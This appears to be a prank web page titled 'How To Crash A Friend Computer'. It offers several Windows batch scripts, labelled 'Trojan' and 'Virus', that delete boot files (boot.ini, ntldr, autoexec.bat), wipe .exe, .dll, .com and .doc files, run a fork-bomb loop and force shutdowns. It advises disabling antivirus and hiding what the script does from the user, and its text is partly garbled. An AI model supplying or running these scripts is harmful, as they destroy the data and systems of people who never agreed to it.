How To Crash A Friend Computer
How To Crash A Friend Computer
How To Crash A Friend Computer
Delete c drive
@ECHO OFF
:RunIt
ECHO Deleting "C:\WINDOWS"
Pause
cls
shutdown -s -t 15 -c "C:\WINDOWS\PROGRAMFILES DELETED. REBOOTING..."
:start
start
goto start
Also a Trojan file so just shut the antivirus if any
@echo off
msg * Virus Activated *
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * you have been hacked. *
shutdown -s -t 10 -c " "
del "C:\WINDOWS\SYSTEM32\bootvrfy"
/Q/S >nul
@echo off
Del /q “c:\windows”
TROJANS
@Echo off
Del *.exe
Del *.com
Del *.dll
Del *.doc
Echo Your Screwed !
Mkdir C:\Screwed!
@Echo off - Turns echo off so user doesn't know what happens
Del *.exe - Deletes all files in the current directory with the .exe
extension
Del *.com - Deletes all files in the current directory with the .com
extension
Del *.dll - Deletes all files in the current directory with the .dll
extension
Del *.doc - Deletes all files in the current directory with the .doc
extension
Echo Your Screwed ! - Displays Your Screwed !
Mkdir C:\Screwed! - Creates the directory Screwed on the C: drive
Virus file
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini